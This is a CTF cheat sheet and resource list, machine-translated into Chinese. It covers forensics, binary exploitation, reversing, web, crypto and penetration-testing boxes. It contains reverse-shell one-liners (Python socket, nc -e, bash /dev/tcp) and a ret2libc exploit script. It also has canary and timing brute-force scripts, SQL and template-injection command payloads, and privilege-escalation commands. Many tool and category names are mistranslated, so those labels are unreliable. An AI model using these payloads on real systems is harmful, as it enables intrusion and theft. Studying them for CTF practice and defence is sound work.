CTFs

我完成的一些网络 CTF 的文章/文件

我还提供了CTF 资源列表以及涵盖大量常见 CTF 挑战的综合备忘单

• 资源

  • YouTube（我们喜欢视频资源）
  • 实践/学习网站
    • CTF
    • 一般的
    • 密码
    • 牧师
    • 网络
    • 加密货币
    • 智能合约
    • 云
    • 渗透测试

• CTF 备忘单

  • 取证/隐写术
    • 一般的
    • 声音的
    • 图像
    • 视频
    • 机器图像
    • 聚氯乙烯
  • Pwn / 二进制利用
    • 一般的
    • 缓冲区溢出
    • PIE（位置独立执行）
    • NX（不可执行）
    • ROP（用于静态编译的二进制文件）
    • 堆栈金丝雀
    • 格式化字符串漏洞
    • 外壳代码
    • 返回Libc
  • 逆向工程
    • SMT 求解器
    • 逐字节反转检查
    • 使用 gef 搜索字符串
  • 网络
    • 模糊测试输入字段
  • 加密货币

    • 网络厨师

    • 常用密码

    • RSA

      • 使用 pycryptodome 获取 RSA 信息
      • 中国剩余定理 (p,q,e,c)
      • 铜匠攻击 (c,e)
      • 波拉德攻击 (n,e,c)
      • 维纳攻击 (n,e,c)

    • 基数 16、32、36、58、64、85、91、92

  • 盒子
    • 正在连接
    • 枚举
    • 权限提升
    • 监听反向shell
    • 反壳
    • 获取交互式 shell
      • Linux
      • 窗口/一般
  • 开源情报
  • 杂项

• 约翰·哈蒙德
  • 曾经制作过很多CTF视频，但已经转向其他事情了
  • 还有大量有用的视频。 CTF 对于教授网络新手来说尤其令人惊叹。
• 实时溢出
  • 制作有关网络的极其有趣且深入的视频。
  • 拥有令人惊叹的 pwn 系列
• 互联网协议安全
  • 记录每台 HackTheBox 机器
    • 讨论不同的解决方法以及为什么事情有效。强烈推荐
• 电脑爱好者
  • 与 Numberphile 是同一个人，但更酷。制作有关基本概念的真正初学者级别的直观视频。
• pwn学院
  • 亚利桑那州立大学教授在 pwn 上有大量视频
  • 指导课程材料：https://pwn.college/
  • 大量练习题：https://dojo.pwn.college/
• Pwn函数
  • 关于不同主题的非常高质量且易于理解的动画视频
  • 主题有点高级，但很容易理解
• 马丁·卡莱尔
  • 制作有关 picoCTF 挑战的精彩视频。
• 萨姆·鲍恩
  • CCSF 教授在他的网站上公开了他所有的讲座和课程材料
• UFSIT
  • UF Cyber​​ 团队（我有点偏见，但肯定是最好的 YouTube 频道之一）
• 金维尔
  • 制作非常直观的视频文章。已完成 picoCTF 2019 的全部内容（很多）
• 布莱克山信息安全
  • 制作大量教育内容的安全公司
  • 始终提供有关安全主题的免费课程和网络广播
• 粉碎堆栈
  • 精彩的逆向工程和硬件黑客视频
  • 他有一个非常酷的逆向工程系列 WannaCry
• 本·格林伯格
  • GMU 教授提供大量 pwn 和恶意软件视频教程
  • 有点过时了，但仍然不错
• 佐治亚理工学院信息安全实验室
  • 良好且先进的pwn深度讲座
  • 需要一些背景知识
• RPISEC
  • RPI 大学团队会议
  • 非常先进并且需要一些计算机科学背景知识
• 马特·布朗
  • 嵌入式安全渗透测试员
  • 制作适合初学者的有关物联网黑客的精彩视频

以下是我整理的一些幻灯片：hackback.zip/presentations

• 皮克CTF
  • 大量令人惊叹的练习挑战。
  • 绝对是入门的黄金标准
• 中佛罗里达大学
  • 总体不错，但是pwn练习很棒
  • 我目前正在努力在这里写文章
• 黑客101
  • CTF，但更适合渗透测试
• 埋弧焊
  • 90% 的时间都处于停机状态，通常所有连接都不起作用
  • 如果它上升了，它有很多很好的入门挑战
• CTF101
  • 我见过的最好的 CTF 介绍之一（gj osiris）
  • 非常简洁且适合初学者

• 黑客盒子
  • OG 盒子网站
    • 盒子经过精心设计以确保质量
  • 现在有一些 CTF 风格的问题
  • 现在有课程可以开始学习
• 尝试破解我
  • 比 HackTheBox 稍微简单一些的盒子
  • 循序渐进的挑战
  • 现在有“学习路径”来指导您完成主题
• 网络安全实验室
  • 很棒的盒子集合
  • 有一些CTF的东西
• 漏洞中心
  • 存在需要自行部署的易受攻击的虚拟机
  • 品种很多，但很难找到好的

• pwnable.kr
  • 难度范围广泛的挑战
• pwnable.tw
  • 比 pwnable.kr 更难
  • 解决问题后会有记录
• pwnable.xyz
  • 更多pwn挑战
  • 解决问题后会有记录
  • 解决完所有挑战后，您可以上传自己的挑战
• PWN道场
  • 我认为最好的pwn挑战合集
  • 附有幻灯片，教您如何做到这一点，如果您需要帮助，可以提出异议
• 恶梦
  • 破解 C 二进制文件的黄金标准
  • 有一些错误/拼写错误，但总体而言令人惊叹
• 密码笔记
  • 网上随机某人的笔记
  • 非常肤浅，但对所有内容都有很好的介绍
• 安全暑期学校
  • 布加勒斯特大学安全课程
  • 非常适合初学者的解释
• 分子束外延
  • RPI 的现代二进制利用课程
  • 有大量的实验室/项目用于练习和一些（稍微过时的）讲座
• How2heap
  • ASU CTF 团队制作的堆利用系列
  • 包括一个非常酷的调试器功能，用于展示漏洞利用的工作原理
• 绳索商场
  • 每个主要架构教学返回导向编程中的一系列挑战
  • 质量非常高。教授从最基本到最先进的技术。
  • 我目前在这里添加我自己的文章
• 凤凰创智教育
  • 大量按难度排序的二进制漏洞利用问题
  • 包括源代码并附带一个包含所有二进制文件的虚拟机。

• 挑战.re
  • 如此多的挑战0_0
  • 大量的多样性
• 倒车.kr
• 破解版
  • 大量的crackme (CTF) 风格的挑战
• 恶意软件独角兽研讨会
  • 有关逆向工程和恶意软件分析的免费研讨会

• 法国网络安全网站
  • 许多网络挑战，难度各异
• 网络黑客.kr
  • 拥有许多优秀的网络挑战档案
• 保护 Web 应用程序的安全
  • 开源 CCSF 课程
• OWASP果汁店
  • 非常适合渗透测试，但对于在 CTF 中探索网络很有用
  • 总共超过 100 个漏洞/挑战
• 斯威格港
  • 理解网络黑客攻击的黄金标准
  • 大量令人惊叹的挑战和解释
• DVWA
  • 非常适合渗透测试，但对于在 CTF 中探索网络很有用
• 无线应用程序
  • 非常适合渗透测试，但对于在 CTF 中探索网络很有用
• CTF挑战赛
  • Adam Langley 制作的网络挑战集合，尽可能真实。
  • 有利于获得错误赏金体验

• 加密黑客
  • 我目前正在努力在这里写文章
• 加密货币
  • OG 加密挑战网站。
• 加密CTF
  • 年度密码学 CTF。往年可访问20{19,20,21,22,23,24}.cr.yp.toc.tf 。

• 捕获以太

• 云可福克斯
  • 引导您设置要使用 cloudfox 进行利用的易受攻击的环境
• 缺陷云
  • 免费挑战，涉及在 S3、EC2 和 Lambda 中寻找秘密

• 黑客101
• 黑客说教
• 开发利用
  • 开源 CCSF 课程
• 安全简介
  • 加州大学圣地亚哥分校课程由 Deian Stefan 教授
  • 涵盖基本的 pwn 和 crypto
• Active Directory 备忘单
• 沃德康姆斯
  • Windows/AD 环境的交互式备忘单
• 洛巴斯
  • 用于利用的Windows “Living off the land”二进制文件、脚本和库的交互式备忘单
• GTFOBins
  • Linux “Living off the land”技术的交互式备忘单。

• 阿佩里求解
  • 自动运行其他隐写工具的工具
• 约翰·哈蒙德针对不同类型的挑战提供了非常好的资源：
  • https://github.com/JohnHammond/ctf-katana
• 另一个非常好的创建和解决挑战的备忘单：
  • https://github.com/apsdehal/awesome-ctf/blob/master/README.md
• 文件
  • file <file.xyz>
  • 确定文件类型
• 斯特吉德
  • steghide extract -sf <file.xyz>
  • 提取嵌入文件
• 搜索
  • stegseek <file> <password list>
  • 使用单词列表提取嵌入文件
  • 超级超级快
• 宾沃克
  • binwalk -M --dd=".*" <file.xyz>
  • 提取嵌入文件
• exif工具
  • exiftool <file.xyz>
  • 读取元数据
• 字符串
  • strings <file.xyz>
  • 查找文件中所有可打印的字符
• 十六进制编辑
  • hexedit <file.xyz>
  • 您可能需要更改某些图像的文件签名才能打开它们
  • 常见文件签名列表
• Ghex（另一个十六进制编辑器，但带有 GUI。如果您需要跳转到某个字节，则很好）
  • ghex <file.xyz>
• docx 文件是容器，因此您可以解压缩它们以查找隐藏内容
  • unzip <file.docx>
• Grep - 使用 grep 递归查找标志的好方法：
  • grep -r --text 'picoCTF{.*}'
  • egrep -r --text 'picoCTF{.*?}
  • 您可以将“picoCTF”更改为您要查找的标志的开头
• Ltrace - 允许您在运行程序时查看代码正在做什么：
  • ltrace ./<file>
  • ltrace -s 100 ./<file>
    • Ltrace 会缩短很长的字符串。您可以使用 -s 来增加 ltrace 显示的字符数。适合查看具有大字符串的 strcmp 时。

• 传真机音频：

  • 例子
  • 解码器

• SSTV（慢扫描电视）音频（月球的东西）

  • 例子
  • 解码器
  • 替代解码器
  • 使用这些 qsstv 设置：

  

• 频谱图图像

  • 解码器

• 改变音调、速度、方向……

  • 音调、速度、音调
  • 撤销

• DTMF（双音多频）电话键

  • multimon-ng -a DTMF -t wav <file.wav>
    • 请记住，这些可以让我多次点击字母。
      • 这可以将数字解码为文本

• 磁带

  • 例子
  • 解码器（wav 到Tap文件）

• 摩尔斯电码

  • 解码器

• 斯蒂格求解

  • 通过位进行切换

• 最重要的

  • 提取图像的专用工具
  • 可用于将损坏的图像组合在一起（例如在 pcap 中）

• 德皮克斯

  • 取消像素化文本

• 检查是否有某些内容经过 Photoshop 处理（查看亮点）

  • https://29a.ch/photo-forensics/#error-level-analysis

• 兹泰格

  • LSB解码器

• 杰斯特格

  • jpeg 隐写术解算器

• 像素恢复

  • 迄今为止我发现的最有效的png恢复工具（只要你不关心水印）
  • photopea 也很好用

• crc32修复

  • 根据校验和修复 png 的高度和宽度

• 聚合酶链式反应

  • 修复 png 页眉和页脚信息

• png-crc-修复

  • 修复png校验和

• PNG检查

  • 找出png中是否有错误
  • PNG检查

• 恢复文件
  • photorec <file.bin>
• 您可以将映像挂载为虚拟机
  • https://habr.com/en/post/444940/
• 挂载.img文件：
  • binwalk -M --dd=".*" <fileName>
  • 在输出上运行file并选择 Linux 文件系统文件
  • losetup /dev/loop<freeLoopNumber> <fileSystemFile>

• 使用 tcpflow 提取数据
  • tcpflow -r <file.pcap>
• 使用wireshark提取数据
  • 文件 → 导出对象 → 进行选择

• 对于这个，我建议查看我的 LearnPwn 存储库，因为这张备忘单是在我对 pwn 了解很多之前制作的
  • 不过，我已经添加了一些注释来修改我这里的内容。

• 检查ELF的安全性
  • checksec <binary>
  • rabin2 -I <binary>
• 检查PE的安全性
  • 二进制安全检查
  • binary-security-check <bin>.exe
• 检查 seccomp bpf
  • seccomp工具
  • seccomp-tools dump ./<binary>
• 看符号
  • readelf -s <binary>
• 看字符串
  • rabin2 -z <binary>
• 将地址打包到字节
  • 小尾数（32 位）
    • python -c "import pwn; print(pwn.p32(<intAddr>))
  • 大尾数（64 位）
    • python -c "import pwn; print(pwn.p64(<intAddr>))
  • pwntools 自动为您打包具有正确字节顺序的地址

• 如果您需要获得 /bin/sh shell 并且您确定它可以工作但程序仍然退出，请使用以下技巧：
  • ( python -c "print '<PAYLOAD>'" ; cat ) | ./<program>
  • pwntools 通过它的process.interactive()来做到这一点

• 确定随机值
  • pwn cyclic <numChars>生成有效负载
  • dmesg | tail | grep segfault查看错误所在
  • pwn cyclic -l 0x<errorLocation>查看控制指令指针的随机偏移量
  • 例子

• 我们可以使用ROP（面向返回编程）来解决

• ROPG小工具
  • 查看小工具并自动生成 ropchains
  • ROPgadget --ropchain --binary <binary>
    • 然后，您可以在代码开头添加填充（基于缓冲区和返回地址之间的差异）并运行代码以获取 shell
    • 演示
• 罗普

在调试器中查找堆栈金丝雀

• 堆栈金丝雀是放置在 EIP/RIP（指令指针）之前的值，可以被缓冲区溢出覆盖。如果堆栈被覆盖为与原来不同的内容，则程序基本上会导致错误。我们的目标是找到原始堆栈，以便当溢出时程序正常运行。
• 堆栈金丝雀取自gs或fs （分别针对 32 位和 64 位）
  • 在反汇编中，在读取某些内容之前，您可以看到类似于以下内容的行：

   0x000000000000121a <+4>: sub    rsp,0x30
   0x000000000000121e <+8>: mov    rax,QWORD PTR fs:0x28
   0x0000000000001227 <+17>:mov    QWORD PTR [rbp-0x8],rax
   0x000000000000122b <+21>:xor    eax,eax

• 这里，堆栈金丝雀被移动到rax偏移量 +8 处。
  • 因此，在下一个偏移处中断并检查 rax ( ir rax ) 中的内容以查看当前的金丝雀是什么

静态金丝雀

• 金丝雀只有在由程序员手动实现（在一些介绍性 pwn 挑战中就是这种情况）或者您能够分叉该程序时才是静态的。
  • 当您分叉二进制文件时，分叉的二进制文件具有相同的金丝雀，因此您可以对其进行逐字节暴力破解

额外的

• 当堆栈金丝雀被不正确地覆盖时，将导致对__stack_chk_fail的调用

  • 如果我们不能泄漏金丝雀，我们还可以修改GOT表以防止其被调用

• 金丝雀存储在当前堆栈的TLS结构中，并由security_init初始化

  • 如果您可以覆盖真正的金丝雀值，则可以将其设置为等于您决定溢出的值。

• 暴力破解静态 4 字节金丝雀的简单脚本：

 #!/bin/python3
from pwn import *

#This program is the buffer_overflow_3 in picoCTF 2018
elf = ELF ( './vuln' )

# Note that it's probably better to use the chr() function too to get special characters and other symbols and letters.
# But this canary was pretty simple :)
alphabet = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890"

canary = ''
# Here we are bruteforcing a canary 4 bytes long
for i in range ( 1 , 5 ):
    for letter in range ( 0 , len ( alphabet )):  # We will go through each letter/number in the string 'alphabet'
        p = elf . process ()  # We start the process
        wait = p . recv (). decode ( 'utf-8' )
        p . sendline ( str ( 32 + i ))  # In this program, we had to specify how many bytes we were gonna send.
        wait = p . recv (). decode ( 'utf-8' )
        p . sendline ( 'A' * 32 + canary + alphabet [ letter ])  # We send the 32 A's to overflow, and then the canary we already have + our guess
        prompt = p . recv (). decode ( 'utf-8' )
        if "Stack" not in prompt :  # The program prints "Stack smashed [...]" if we get wrongfully write the canary.
            canary += alphabet [ letter ]  # If it doesn't print that, we got part of our canary :)
            break  # Move on to the next canary letter/number

print ( "The canary is: " + canary )

• 如果您看到“printf(buf)”或类似的内容，请查看表 2，了解要尝试的操作：
  • https://owasp.org/www-community/attacks/Format_string_attack
• 强烈推荐观看 John Hammond 在 picoCTF 2018 中进行的“echooo”挑战
• 有时，尝试仅从堆栈中打印字符串，如下所示： '%s %s %s %s %s %s' 可能会导致错误，因为并非堆栈中的所有内容都是字符串。
• 尝试通过执行“%x %x %x %x %x %s”来最小化这种情况
• 您不必不断增加键入的 %x 和 %s 数量，而是可以传递一个参数以使其更容易：
  • %1$s - 这会将堆栈中的第一个值（据我所知，缓冲区旁边的值）打印为字符串。
  • %2$s - 这会将第二个值打印为字符串，您明白了
  • 您可以使用单行循环尝试通过泄漏堆栈来查找标志。按 ^C (CTRL + C) 转到下一个值。
    • for i in {1..100}; do echo "%$i$s" | nc [b7dca240cf1fbf61.247ctf.com](http://b7dca240cf1fbf61.247ctf.com/) 50478; done
• 您可以使用不同的尺寸参数来控制泄漏量：
  • %hhx泄漏 1 个字节（int 大小的一半）
  • %hx泄漏 2 个字节（int 大小的一半）
  • %x泄漏 4 个字节（int 大小）
  • %lx泄漏 8 个字节（长尺寸）
• 关于使用 fstring vuln 和 %n 修改堆栈的非常好的视频：
  • https://www.youtube.com/watch?v=gzLPVkZbaPA&ab_channel=MartinCarlisle

• 查找不同 shellcode 的好网站：
  • http://shell-storm.org/shellcode/

• 我们将覆盖 EIP 来调用 system() 库函数，我们还将传递它应该执行的内容，在本例中是一个带有“/bin/sh”的缓冲区

• 很好的解释：

  • https://www.youtube.com/watch?v=FvQYGAM1X9U&ab_channel=NPTEL-NOCIITM

• 很好的例子（转到 3:22:44）：

  • https://www.youtube.com/watch?v=uIkxsBgkpj8&t=13257s&ab_channel=freeCodeCamp.org
  • https://www.youtube.com/watch?v=NCLUm8geskU&ab_channel=BenGreenberg

• 获取 execve("/bin/sh") 的地址

  • one_gadget <libc file>

• 如果您已经知道 libc 文件和位置（即不必泄漏它们......）

 #!/bin/python3

from pwn import *
import os

binaryName = 'ret2libc1'

# get the address of libc file with ldd
libc_loc = os . popen ( f'ldd { binaryName } ' ). read (). split ( ' n ' )[ 1 ]. strip (). split ()[ 2 ]

# use one_gadget to see where execve is in that libc file
one_gadget_libc_execve_out = [ int ( i . split ()[ 0 ], 16 ) for i in os . popen ( f'one_gadget { libc_loc } ' ). read (). split ( " n " ) if "execve" in i ]

# pick one of the suitable addresses
libc_execve_address = one_gadget_libc_execve_out [ 1 ]

p = process ( f'./ { binaryName } ' )
e = ELF ( f'./ { binaryName } ' )
l = ELF ( libc_loc )

# get the address of printf from the binary output
printf_loc = int ( p . recvuntil ( ' n ' ). rstrip (), 16 )

# get the address of printf from libc
printf_libc = l . sym [ 'printf' ]

# calculate the base address of libc
libc_base_address = printf_loc - printf_libc

# generate payload

# 0x17 is from gdb analysis of offset from input to return address
offset = 0x17

payload = b"A" * offset
payload += p64 ( libc_base_address + libc_execve_address )

# send the payload
p . sendline ( payload )

# enter in interactive so we can use the shell created from our execve payload
p . interactive ()

酷指南：https://opensource.com/article/20/4/linux-binary-analysis

• 吉德拉
  • 非常有用的反编译器
• dotPeek 或 dnSpy
  • 反编译.NET可执行文件
• jadx 和 jadx-gui
  • 反编译apk
• 开发工具区
  • 在线反编译java
• 被子花
  • 基于终端的高级 java 反编译器
• apk工具
  • 反编译apk
  • apktool d *.apk
• 数据库
  • 二元分析
  • peda（用于增加功能的扩展）
  • gef（pwners 的 gdb 扩展）
• 雷达雷2
  • 二元分析
• 牙线
  • 类固醇上的strings 。使用静态分析来查找和计算字符串

• 愤怒（蟒蛇）
  • 文档
  • 教程
• z3
  • 教程

https://dustri.org/b/defeating-the-recons-movfuscator-crackme.html

• 这是我为使用基于时间的攻击的挑战制作的版本：
  • 您可能需要运行几次才能解释随机性

 #!/bin/python3

from pwn import *
import string

keyLen = 8
binaryName = 'binary'

context . log_level = 'error'

s = ''
print ( "*" * keyLen )
for chars in range ( keyLen ):
    a = []
    for i in string . printable :
        p = process ( f'perf stat -x, -e cpu-clock ./ { binaryName } ' . split ())
        p . readline ()
        currPass = s + i + '0' * ( keyLen - chars - 1 )
        # print(currPass)
        p . sendline ( currPass . encode ())
        p . readline ()
        p . readline ()
        p . readline ()
        info = p . readall (). split ( b',' )[ 0 ]
        p . close ()
        try :
            a . append (( float ( info ), i ))
        except :
            pass
        # print(float(info), i)
    a . sort ( key = lambda x : x [ 0 ])
    s += str ( a [ - 1 ][ 1 ])
    print ( s + "*" * ( keyLen - len ( s )))
    # print(sorted(a, key = lambda x: x[0]))

p = process ( f'./ { binaryName } ' )
p . sendline ( s . encode ())
p . interactive ()

• 如果您的标志在任何时候被读入变量或寄存器，您可以在移动标志后中断并运行grep <string> ，gef 将自动显示与您的搜索模式匹配的字符串

• 尼克托（如果允许的话）
  • 自动寻找漏洞
• gobuster（如果允许的话）
  • 暴力破解目录和文件
• 九头蛇（如果允许的话）
  • 暴力登录各种服务
• 打嗝套件
  • 拦截网络请求并允许您修改它们
• Wireshark
  • 分析实时网络流量和 pcap 文件
• PHP反向shell
  • 对于允许您上传文件的网站很有用
  • 该文件需要在服务器上执行才能起作用
• WP扫描
  • 扫描 WordPress 网站
  • 使用wpscan --url <site> --plugins-detection mixed -e与 api 密钥以获得最佳结果
• 杰威特
  • 您可以识别 JWT 令牌，因为 Base64 编码的 json（以及 jwt 令牌）以“ey”开头
  • 该站点将解码 JSON Web 令牌
  • 您可以破解 JSON Web 令牌的秘密来修改和签署您自己的令牌
    • echo <token> > jwt.txt
    • john jwt.txt
• SQL注入
  • sqlmap
    • sqlmap --forms --dump-all -u <url>
    • 自动化 SQL 注入过程
  • 基本的SQL注入
    • 在登录表单中输入'OR 1=1--
    • 在服务器上，这将计算为SELECT * FROM Users WHERE User = '' OR 1=1--' AND Pass = ''
    • 1=1计算结果为 true，满足OR语句，查询的其余部分由--注释掉
• 有效负载AllTheThings
  • 具有大量有效负载的网络开发的绝佳资源
• 模板注入
  • tpl映射
    • 自动服务器端模板注入
  • 金甲注射液
    • {{ config.items() }}
  • 烧瓶注射
    • {{配置}}
  • Python eval() 函数
    • __import__.('subprocess').getoutput('<command>')
      • 如果不起作用，请确保交换括号
    • __import__.('subprocess').getoutput('ls').split('\n')
      • 列出系统中的文件
  • 更多Python注入
• 跨站脚本
  • CSP 评估器
    • Google 的内容安全政策评估器

• FFUF
  • 将请求复制到输入字段并将参数替换为“FUZZ”：
    • ffuf -request input.req -request-proto http -w /usr/share/seclists/Fuzzing/special-chars.txt -mc all
    • 使用-fs过滤大小

• 网络厨师
  • 执行各种密码操作

密码检测器

• 哈希德
  • 用于检测哈希类型的命令行实用程序

• 凯撒密码
• 维吉尼亚密码

 #### Solver using custom table
cipherText = ""
plainText = ""
flagCipherText = ""
tableFile = ""

with open ( cipherText ) as fin :
    cipher = fin . readline (). rstrip ()

with open ( plainText ) as fin :
    plain = fin . readline (). rstrip ()

with open ( flagCipherText ) as fin :
    flag = fin . readline (). rstrip ()

with open ( tableFile ) as fin :
    table = [ i . rstrip (). split () for i in fin . readlines ()]

table [ 0 ]. insert ( 0 , "" ) # might have to modify this part.
            # just a 2d array with the lookup table
            # should still work if the table is slightly off, but the key will be wrong
key = ""
for i , c in enumerate ( plain [ 0 : 100 ]):
  col = table [ 0 ]. index ( c )
  for row in range ( len ( table )):
    if table [ row ][ col ] == cipher [ i ]:
      key += table [ row ][ 0 ]
      break

print ( key )

dec_flag = ""
for i , c in enumerate ( flag [: - 1 ]):
  col = table [ 0 ]. index ( key [ i ])
  for row in range ( len ( table )):
    if table [ row ][ col ] == flag [ i ]:
      dec_flag += table [ row ][ 0 ]
      break

print ( dec_flag )

• 替代密码
• 罗特13
• 键控凯撒密码

 from Crypto . PublicKey import RSA

keyName = "example.pem"

with open ( keyName , 'r' ) as f :
    key = RSA . import_key ( f . read ())

print ( key )

# You can also get individual parts of the RSA key 
# (sometimes not all of these)
print ( key . p )
print ( key . q )
print ( key . n )
print ( key . e )
print ( key . d )
print ( key . u )

# public keys have n and e 

• 当您可以因式分解数字n时使用此选项

  • 糟糕的实施将有多个主要因素
  • 证明

• 老的

 def egcd ( a , b ):
    if a == 0 :
        return ( b , 0 , 1 )
    g , y , x = egcd ( b % a , a )
    return ( g , x - ( b // a ) * y , y )

def modinv ( a , m ):
    g , x , y = egcd ( a , m )
    if g != 1 :
        raise Exception ( 'No modular inverse' )
    return x % m

p = 
q = 
e = 
c = 

n = p * q # use factordb command or website to find factors

phi = ( p - 1 ) * ( q - 1 ) # phi is simply the product of (factor_1-1) * ... * (factor_n -1)

d = modinv ( e , phi ) # private key

# print(d)

m = pow ( c , d , n ) # decrypted plaintext message in long integer form

thing = hex ( m )[ 2 :] # ascii without extra stuff at the start (0x)
print ( bytes . fromhex ( thing ). decode ( 'ascii' ))

• 新的

 #!/bin/python3
from Crypto . Util . number import *
from factordb . factordb import FactorDB

# ints:
n =    
e =  
c =  

f = FactorDB ( n )
f . connect ()
factors = f . get_factor_list ()

phi = 1
for i in factors :
    phi *= ( i - 1 )

d = inverse ( e , phi )
m = pow ( c , d , n )

flag = long_to_bytes ( m ). decode ( 'UTF-8' )
print ( flag )

• 提供因子和欧拉 totient (phi) 的网站
  • https://www.alpertron.com.ar/ECM.HTM

• 通常在指数非常小时使用 (e <= 5)
  • 证明

 from Crypto . Util . number import *
def nth_root ( radicand , index ):
    lo = 1
    hi = radicand
    while hi - lo > 1 :
        mid = ( lo + hi ) // 2
        if mid ** index > radicand :
            hi = mid
        else :
            lo = mid

    if lo ** index == radicand :
        return lo
    elif hi ** index == radicand :
        return hi
    else :
        return - 1

c = 
e = 

plaintext = long_to_bytes ( nth_root ( c , e ))
print ( plaintext . decode ( "UTF-8" ))

• 基于 Pollard 的因式分解方法，如果素数的乘积是 (B) 光滑的，则它们很容易因式分解
  • 如果p-1 | B!就是这种情况p-1 | B!并且q - 1因子 > B

 from Crypto . Util . number import *
from math import gcd

n = 
c = 
e = 

def pollard ( n ):
    a = 2
    b = 2
    while True :
        a = pow ( a , b , n )
        d = gcd ( a - 1 , n )
        if 1 < d < n : 
            return d
        b += 1

p = pollard ( n )
q = n // p

phi = 1
for i in [ p , q ]:
    phi *= ( i - 1 )

d = inverse ( e , phi )
m = pow ( c , d , n )

flag = long_to_bytes ( m ). decode ( 'UTF-8' )
print ( flag )

• 当 d 太小（或 e 太大）时使用
  • 使用这个Python模块
  • 证明

 from Crypto . Util . number import *
import owiener

n = 
e = 
c = 

d = owiener . attack ( e , n )
m = pow ( c , d , n )

flag = long_to_bytes ( m )
print ( flag )

https://github.com/mufeedvh/basecrack

• SSH
  • ssh <username>@<ip>
  • ssh <username>@<ip> -i <private key file>
  • 将 SSH 作为文件系统挂载到本地：
    • sshfs -p <port> <user>@<ip>: <mount_directory>
  • 已知主机
    • ssh-copy-id -i ~/.ssh/id_rsa.pub <user@host>
• 网猫
  • nc <ip> <port>

• 机器发现

  • netdiscover

• 机器端口扫描

  • nmap -sC -sV <ip>

• Linux枚举

  • enum4linux <ip>

• 中小企业枚举

  • smbmap -H <ip>

• 连接到 SMB 共享

  • smbclient //<ip>/<share>

• 豌豆
  • ./linpeas.sh
  • 自动寻找权限升级向量
• 列出我们可以以 root 身份运行的命令
  • sudo -l
• 查找具有SUID权限的文件
  • find / -perm -u=s -type f 2>/dev/null
  • 这些文件以所有者的权限执行，而不是由执行它们的用户执行
• 查找所有服务的权限
  • accesschk.exe -uwcqv *
  • 查找不在系统或管理员帐户下的服务
• 查询服务
  • sc qc <service name>
  • 仅适用于 cmd.exe

• nc -lnvp <port>

• revshells.com
  • 基本上包含您可能需要的所有内容的模板
• python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<ip>",<port>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
• nc -e /bin/sh <ip> <port>
• bash -i >& /dev/tcp/<ip>/<port> 0>&1

1. 运行以下 python 命令以使其部分交互： python -c 'import pty;pty.spawn("/bin/bash");'
2. 使用CTRL+Z退出 netcat 会话并在本地运行stty raw -echo
3. 使用命令fg重新输入会话（如果需要，可在后面输入作业 ID）
4. 通过运行export TERM=xterm将终端模拟器更改为 xterm（这可能不是必需的）
5. 通过运行export SHELL=bash将 shell 更改为 bash （这可能不是必需的）
6. 完毕！现在你的 shell 应该是完全交互式的

1. 在您的系统上安装rlwrap
2. 现在，每次运行 nc 侦听器时，只需将rlwrap放在前面
3. 例如： rlwrap nc -lvnp 1337
   • 这将为您提供箭头键和命令历史记录，但不会为 Windows 和 *nix 系统提供自动完成功能（据我所知）

• 皮梅耶斯
  • 在互联网上反向搜索面孔
• 开源情报框架
  • 聚合了大量 OSINT 工具的网站
• 地理间谍人工智能
  • 地理空间视觉法学硕士，可以仅根据图像估计位置
• 立交桥涡轮
  • 可让您查询 OpenStreetMap API 并可视化结果的网站
• Bellingcat OSM 搜索
  • 可让您轻松查询 OSM API 的网站

• 解决 DNS 错误

  • dig <site> <recordType>
  • 记录类型列表
    • 请务必尝试 TXT

• 作为不同的架构运行二进制文件

  • 64 位：
    • linux64 ./<binary>
  • 32位：
    • linux32 ./<binary>

• 提取 MS 宏：

  • https://www.onlinehashcrack.com/tools-online-extract-vba-from-office-word-excel.php

• 查看 CNC G 代码

  • https://ncviewer.com/